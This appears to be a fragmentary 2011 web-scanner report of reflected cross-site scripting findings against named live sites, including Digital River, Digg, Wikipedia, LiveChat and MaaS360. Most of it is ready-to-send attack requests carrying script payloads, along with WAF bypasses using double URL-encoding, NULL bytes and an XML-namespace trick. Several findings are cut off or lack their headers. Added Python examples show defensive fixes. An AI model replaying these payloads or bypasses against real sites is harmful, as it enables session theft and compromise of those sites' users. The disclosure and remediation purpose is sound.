Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
X-WBX: web16
Content-Length: 3473
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f6ed4<a>4e2f98ce392 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /syndication/xml/i/8334ea93-781f-4bce-bc32-094c3ddcee36f6ed4<a>4e2f98ce392/iv/6/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/b80ba304ef1c35dcdad3189bdbcfd323ab4bdea4000001322d93d756/u/3/ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://cdn.widgetserver.com/syndication/flash/blidget/blidget.swf?cb=53801
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Content-Type: text/xml;charset=UTF-8
Date: Sun, 04 Sep 2011 12:21:41 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
X-WBX: web16
Content-Length: 1696
The value of REST URL parameter 18 is copied into the XML document as plain text between tags. The payload 571a5%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253ee21715199ab was submitted in the REST URL parameter 18. This input was echoed as 571a5<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>e21715199ab in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 18 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
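The order-of-operations problem the remediation detail describes, for this finding and for the identical REST URL parameter 18 finding earlier in this section, as an added Python example. This is not the scanner's output or the vendor's code: the blocklist, the `<name>` element and the handler names are assumptions, and the sample input is the scanner's own double-encoded payload. The web server decodes the path once; a blocklist applied to that once-decoded value sees no `<`, and a second, unnecessary decode then produces it.

```python
import re
from typing import Optional
from urllib.parse import unquote
from xml.sax.saxutils import escape

# Assumed blocklist: the characters the scanned application appears to reject.
BLOCKED = re.compile(r"[<>\"']")


def webserver_decode(raw_path_segment: str) -> str:
    """The single percent-decode the web server performs before the application runs."""
    return unquote(raw_path_segment)


def vulnerable_handler(segment: str) -> Optional[str]:
    """Validate, then decode a second time: %3c passes the blocklist and becomes '<'."""
    if BLOCKED.search(segment):
        return None
    value = unquote(segment)              # the unnecessary second decode
    return f"<name>{value}</name>"        # raw interpolation into the XML body


def canonicalise_then_validate(segment: str) -> Optional[str]:
    """If a second decode really is required, perform it before validating."""
    value = unquote(segment)
    if BLOCKED.search(value) or "\x00" in value:
        return None
    return f"<name>{escape(value)}</name>"


def hardened_handler(segment: str) -> Optional[str]:
    """Preferred: no second decode, validate the canonical value, escape on output anyway."""
    if BLOCKED.search(segment) or "\x00" in segment:
        return None
    return f"<name>{escape(segment)}</name>"


if __name__ == "__main__":
    # Constructed input: the double-encoded payload from the finding above.
    raw = ("87d1a%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg"
           "%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert"
           "%25281%2529%2527%252f%253e%253c%252fa%253efda49cd4e59")
    seg = webserver_decode(raw)
    print("vulnerable :", vulnerable_handler(seg))
    print("canonical  :", canonicalise_then_validate(seg))
    print("hardened   :", hardened_handler(seg))
```

The output escaping in the hardened handler is the part that matters even if the blocklist is later relaxed: an `<a xmlns:a='http://www.w3.org/1999/xhtml'>` element that reaches the XML body as `&lt;a xmlns:a=...&gt;` is text, not a new namespace, so the Firefox rendering trick described above has nothing to work with.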
Request
GET /syndication/xml/i/a43042dd-c472-4930-a919-f43bb2d1f2bf/iv/6/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/370016ce47009b49084287e2f14e2ed91c295315000001322d9ed98f571a5%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253ee21715199ab/u/3/ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://cdn.widgetserver.com/syndication/flash/blidget/blidget.swf?cb=53801
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Content-Type: text/xml;charset=UTF-8
Date: Sun, 04 Sep 2011 12:23:12 GMT
Expires: Wed, 07 Sep 2011 12:22:12 GMT
ObjectVersions: [Inst: req 6, db 6]; [Reg: req 506, db 506];
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
X-WBX: web04
Content-Length: 3473
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6cb5e<a>fa25a69a60 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /syndication/xml/i/a43042dd-c472-4930-a919-f43bb2d1f2bf6cb5e<a>fa25a69a60/iv/6/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/506/t/370016ce47009b49084287e2f14e2ed91c295315000001322d9ed98f/u/3/ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://cdn.widgetserver.com/syndication/flash/blidget/blidget.swf?cb=53801
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Content-Type: text/xml;charset=UTF-8
Date: Sun, 04 Sep 2011 12:21:55 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
X-WBX: web03
Content-Length: 1695
1.21. http://corporate.digitalriver.com/store [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://corporate.digitalriver.com
Path: /store
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 87700-->42ee04a8087 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Response
HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=114053839011,0)
Date: Sun, 04 Sep 2011 14:19:10 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc1app53
Content-Length: 48029
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit ...[SNIP]... <!--!esi:include src="/store?87700-->42ee04a8087=1&Action=DisplayESIPage&CallingPageID=CorpPage&Currency=USD&ESIHC=69e81329&Env=BASE&Locale=en_US&SiteID=digriv&StyleID=27010600&StyleVersion=76&ThemeID=16015700&ceid=173655500&cename=TopHeader&id=Prod ...[SNIP]...
1.22. http://corporate.digitalriver.com/store/digriv/html/pbPage.Homepage [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://corporate.digitalriver.com
Path: /store/digriv/html/pbPage.Homepage
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload da9c3--><script>alert(1)</script>dd29a7ec5c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %008affd"><script>alert(1)</script>0f044f917b8 was submitted in the REST URL parameter 1. This input was echoed as 8affd"><script>alert(1)</script>0f044f917b8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /submit%008affd"><script>alert(1)</script>0f044f917b8 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload %004394f<script>alert(1)</script>f633f3a958b was submitted in the REST URL parameter 2. This input was echoed as 4394f<script>alert(1)</script>f633f3a958b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /wiki/%004394f<script>alert(1)</script>f633f3a958b/x26amp HTTP/1.1
Host: en.wikipedia.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 404 Not Found
Date: Sun, 04 Sep 2011 14:01:37 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
X-Wikimedia-Debug: prot=http:// serv=en.wikipedia.org loc=/wiki/%004394f<script>alert(1)</script>f633f3a958b/x26amp
Content-Length: 5410
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sq61.wikimedia.org
X-Cache-Lookup: MISS from sq61.wikimedia.org:3128
X-Cache: MISS from sq38.wikimedia.org
X-Cache-Lookup: MISS from sq38.wikimedia.org:80
Connection: close
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Wikimedia page not found: http://en.wikipedia.org/wiki/%004394f<script& ...[SNIP]... <p style="font-weight: bold;">To check for "%004394f<script>alert(1)</script>f633f3a958b/x26amp" on Wikipedia, see: <a href="http://en.wikipedia.org/wiki/%004394f<script> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00aa7a3"><script>alert(1)</script>8cfe4eae7a3 was submitted in the REST URL parameter 2. This input was echoed as aa7a3"><script>alert(1)</script>8cfe4eae7a3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
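The NULL byte bypass described in this and the two preceding findings (digg.com REST URL parameter 1, and both en.wikipedia.org REST URL parameter 2 findings), as an added Python example that is not part of the scanner output or of either site's code. It simulates a native-code filter that matches signatures on a NUL-terminated C string next to a length-aware check, and shows the application-side fix the remediation detail calls for. The signature list, the page template and the function names are assumptions; the sample path is the scanner's own payload.

```python
import html
from urllib.parse import quote, unquote_to_bytes

# Assumed signature list for the simulated WAF.
SIGNATURES = (b"<script", b"onerror=", b"javascript:")


def c_string_view(buf: bytes) -> bytes:
    """What native code sees if it treats buf as a NUL-terminated C string."""
    nul = buf.find(b"\x00")
    return buf if nul < 0 else buf[:nul]


def native_waf_blocks(raw_path: bytes) -> bool:
    """Simulated native-code WAF: signatures are matched on the C-string view of the
    decoded path, so everything after the first %00 is invisible to it."""
    view = c_string_view(unquote_to_bytes(raw_path)).lower()
    return any(sig in view for sig in SIGNATURES)


def length_aware_waf_blocks(raw_path: bytes) -> bool:
    """The same signatures over the full decoded length, which is what the application gets."""
    decoded = unquote_to_bytes(raw_path).lower()
    return any(sig in decoded for sig in SIGNATURES)


def render_not_found(raw_path: bytes) -> str:
    """Vulnerable 404 page in the shape of the response above: the path is echoed raw."""
    path = unquote_to_bytes(raw_path).decode("utf-8", "replace")
    return (f'<p>To check for "{path}" on Wikipedia, see: '
            f'<a href="http://en.wikipedia.org{path}">')


def render_not_found_fixed(raw_path: bytes) -> str:
    """Fix in the application, independent of any WAF: drop NUL bytes, then encode per context."""
    path = unquote_to_bytes(raw_path).replace(b"\x00", b"").decode("utf-8", "replace")
    text = html.escape(path)                      # text-node context
    href = html.escape(quote(path, safe="/"))     # URL context, then attribute context
    return (f'<p>To check for "{text}" on Wikipedia, see: '
            f'<a href="http://en.wikipedia.org{href}">')


if __name__ == "__main__":
    # Constructed input: the scanner's payload from the finding above.
    payload = b"/wiki/%004394f<script>alert(1)</script>f633f3a958b/x26amp"
    print("native WAF blocks       :", native_waf_blocks(payload))
    print("length-aware WAF blocks :", length_aware_waf_blocks(payload))
    print(render_not_found_fixed(payload))
```

The point of the two `render_*` functions is that the WAF outcome never enters the decision: the page is safe because the application encodes for the HTML text and attribute contexts it writes into, and the NUL byte is stripped only so that it cannot be passed on to some later native consumer.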
Request
GET /wiki/%00aa7a3"><script>alert(1)</script>8cfe4eae7a3/x26amp HTTP/1.1
Host: en.wikipedia.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 404 Not Found
Date: Sun, 04 Sep 2011 14:01:17 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
X-Wikimedia-Debug: prot=http:// serv=en.wikipedia.org loc=/wiki/%00aa7a3"><script>alert(1)</script>8cfe4eae7a3/x26amp
Content-Length: 5438
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sq61.wikimedia.org
X-Cache-Lookup: MISS from sq61.wikimedia.org:3128
X-Cache: MISS from sq71.wikimedia.org
X-Cache-Lookup: MISS from sq71.wikimedia.org:80
Connection: close
The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 4ba19<script>alert(1)</script>049c3a47bdf was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gis.cgi?serverType=control&licenseID=1019931&jsonp=__lc_load4ba19<script>alert(1)</script>049c3a47bdf HTTP/1.1
Host: gis1.livechatinc.com
Proxy-Connection: keep-alive
Referer: http://support.kasperskyamericas.com/corporate/anti-virus-6-r2-mp4-windows-workstations
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 929e6<script>alert(1)</script>6e265ba17ce was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gis.cgi?serverType=control&licenseID=1019931&jsonp=__lc_load929e6<script>alert(1)</script>6e265ba17ce HTTP/1.1
Host: gis2.livechatinc.com
Proxy-Connection: keep-alive
Referer: http://support.kasperskyamericas.com/corporate/contact-information
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload ea3d9<script>alert(1)</script>6b4f76bc96d was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gis.cgi?serverType=control&licenseID=1019931&jsonp=__lc_loadea3d9<script>alert(1)</script>6b4f76bc96d HTTP/1.1
Host: gis3.livechatinc.com
Proxy-Connection: keep-alive
Referer: http://support.kasperskyamericas.com/corporate/contact-information
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload d4bbe<script>alert(1)</script>ae16b26f03b was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gis.cgi?serverType=control&licenseID=1019931&jsonp=__lc_loadd4bbe<script>alert(1)</script>ae16b26f03b HTTP/1.1
Host: gis4.livechatinc.com
Proxy-Connection: keep-alive
Referer: http://support.kasperskyamericas.com/corporate/open-support-case
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 6c10a<script>alert(1)</script>adbd0b08f57 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gis.cgi?serverType=control&licenseID=1019931&jsonp=__lc_load6c10a<script>alert(1)</script>adbd0b08f57 HTTP/1.1
Host: gis5.livechatinc.com
Proxy-Connection: keep-alive
Referer: http://support.kasperskyamericas.com/corporate/live-chat
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
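The five gis1 to gis5.livechatinc.com findings above are the same JSONP endpoint: the `jsonp` callback name is echoed unmodified into a response the browser treats as HTML. The fix a practitioner would want is shown here as an added Python example; it is not the scanner's output or LiveChat's code, and the allowlist pattern, the length limit, the header set and the function names are assumptions. A JSONP callback is a JavaScript identifier, so anything else can be rejected outright, and the response should be served as script, not as HTML.

```python
import json
import re

# Assumed allowlist: a JavaScript identifier, optionally dotted (e.g. "__lc_load", "lc.cb").
CALLBACK_RE = re.compile(r"^[A-Za-z_$][A-Za-z0-9_$]*(?:\.[A-Za-z_$][A-Za-z0-9_$]*)*$")
MAX_CALLBACK_LEN = 64


def vulnerable_jsonp(callback, data):
    """What the scanned endpoint appears to do: echo the callback unmodified into a
    response served as text/html, so a <script> inside the callback is parsed as markup."""
    headers = {"Content-Type": "text/html;charset=UTF-8"}
    return 200, headers, f"{callback}({json.dumps(data)});"


def safe_jsonp(callback, data):
    """Allowlist the callback, serve the result as script, and keep '<' out of the payload."""
    if len(callback) > MAX_CALLBACK_LEN or not CALLBACK_RE.fullmatch(callback):
        headers = {"Content-Type": "application/json; charset=utf-8",
                   "X-Content-Type-Options": "nosniff"}
        return 400, headers, json.dumps({"error": "invalid callback"})
    headers = {"Content-Type": "application/javascript; charset=utf-8",
               "X-Content-Type-Options": "nosniff"}
    # json.dumps with ensure_ascii already escapes U+2028/U+2029; '<' is escaped so the
    # payload can never contain "</script>" or any other tag start if it is ever inlined.
    payload = json.dumps(data).replace("<", "\\u003c")
    # The "/**/" prefix is a common JSONP hardening: the response cannot double as a file
    # format that must begin at byte 0.
    return 200, headers, f"/**/ {callback}({payload});"


if __name__ == "__main__":
    # Constructed inputs: the scanner's payload and a benign callback.
    bad = "__lc_load4ba19<script>alert(1)</script>049c3a47bdf"
    print(vulnerable_jsonp(bad, {"ok": True}))
    print(safe_jsonp(bad, {"ok": True}))
    print(safe_jsonp("__lc_load", {"msg": "</script><b>"}))
```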
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a6ee3<img%20src%3da%20onerror%3dalert(1)>42547d9da14 was submitted in the REST URL parameter 3. This input was echoed as a6ee3<img src=a onerror=alert(1)>42547d9da14 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Response
HTTP/1.1 404 There is no Action mapped for namespace /activity and action name activity.gifa6ee3<img src=a onerror=alert(1)>42547d9da14.
Server: Resin/3.1.8
Content-Type: text/html; charset=utf-8
Date: Sun, 04 Sep 2011 12:17:38 GMT
Content-Length: 484
<html> <head><title>404 There is no Action mapped for namespace /activity and action name activity.gifa6ee3<img src=a onerror=alert(1)>42547d9da14.</title></head> <body> <h1>404 There is no Action mapped for namespace /activity and action name activity.gifa6ee3<img src=a onerror=alert(1)>42547d9da14.</h1> ...[SNIP]...
1.32. http://hs.maas360.com/main-site-theme/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://hs.maas360.com
Path: /main-site-theme/
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 59837--><a>584384740af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
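The HTML comment context described in this remediation detail and in findings 1.21 and 1.22 above, as an added Python example that is not part of the scanner output or of either site's code. The 1.21 response shows the shape being modelled: an ESI include whose query string carries whatever parameter names the client sent, written inside `<!--!esi:include ... -->`. The allowlist of forwarded parameters and the function names are assumptions. In HTML parsing a comment ends at `-->` or `--!>`, so the check below looks for either.

```python
import re
from urllib.parse import urlencode

# Assumed allowlist: the parameters the ESI fragment is actually meant to forward.
ALLOWED_PARAMS = {"Action", "CallingPageID", "Currency", "Locale", "SiteID", "StyleID"}

COMMENT_CLOSE = re.compile(r"--!?>")


def vulnerable_esi_include(raw_query: str) -> str:
    """Copies the raw query string into an HTML comment, as the scanned page does."""
    return f'<!--!esi:include src="/store?{raw_query}"-->'


def hardened_esi_include(params: dict) -> str:
    """Rebuild the query from known parameter names only and percent-encode the values.
    urlencode turns '>' into %3E, so no '-->' or '--!>' can appear inside the comment."""
    kept = {k: v for k, v in params.items() if k in ALLOWED_PARAMS}
    return f'<!--!esi:include src="/store?{urlencode(kept)}"-->'


def comment_closes_early(markup: str) -> bool:
    """True if the comment could end anywhere before its intended final '-->'."""
    body = markup[len("<!--"):]
    m = COMMENT_CLOSE.search(body)
    return m is not None and m.end() != len(body)


if __name__ == "__main__":
    # Constructed input: the parameter-name payload from finding 1.21 plus real parameters.
    raw = "87700-->42ee04a8087=1&Action=DisplayESIPage&Currency=USD"
    print(vulnerable_esi_include(raw), comment_closes_early(vulnerable_esi_include(raw)))
    safe = hardened_esi_include({"87700-->42ee04a8087": "1",
                                 "Action": "DisplayESIPage", "Currency": "US-->D"})
    print(safe, comment_closes_early(safe))
```

The safer design is the one the remediation detail implies: do not put request data inside comments at all. Where an include directive genuinely needs request parameters, building it from an allowlist (as above) also stops the scanner's "arbitrarily supplied request parameter" from being forwarded in the first place.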
Request
GET /main-site-theme/?59837--><a>584384740af=1 HTTP/1.1
Host: hs.maas360.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a0f4"-alert(1)-"e305e7e075d was submitted in the mpck parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c74b4'%3balert(1)//f093b248a6a was submitted in the mpck parameter. This input was echoed as c74b4';alert(1)//f093b248a6a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3905d"%3balert(1)//ecf698608ec was submitted in the mpvc parameter. This input was echoed as 3905d";alert(1)//ecf698608ec in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d58f0'%3balert(1)//57142596da5 was submitted in the mpvc parameter. This input was echoed as d58f0';alert(1)//57142596da5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51ff7'%3balert(1)//178d594bd57 was submitted in the mpck parameter. This input was echoed as 51ff7';alert(1)//178d594bd57 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 656a0"-alert(1)-"a474aaf0673 was submitted in the mpck parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ab5d"%3balert(1)//95b028c6b12 was submitted in the mpvc parameter. This input was echoed as 1ab5d";alert(1)//95b028c6b12 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fa8f2'%3balert(1)//0f211c345d2 was submitted in the mpvc parameter. This input was echoed as fa8f2';alert(1)//0f211c345d2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
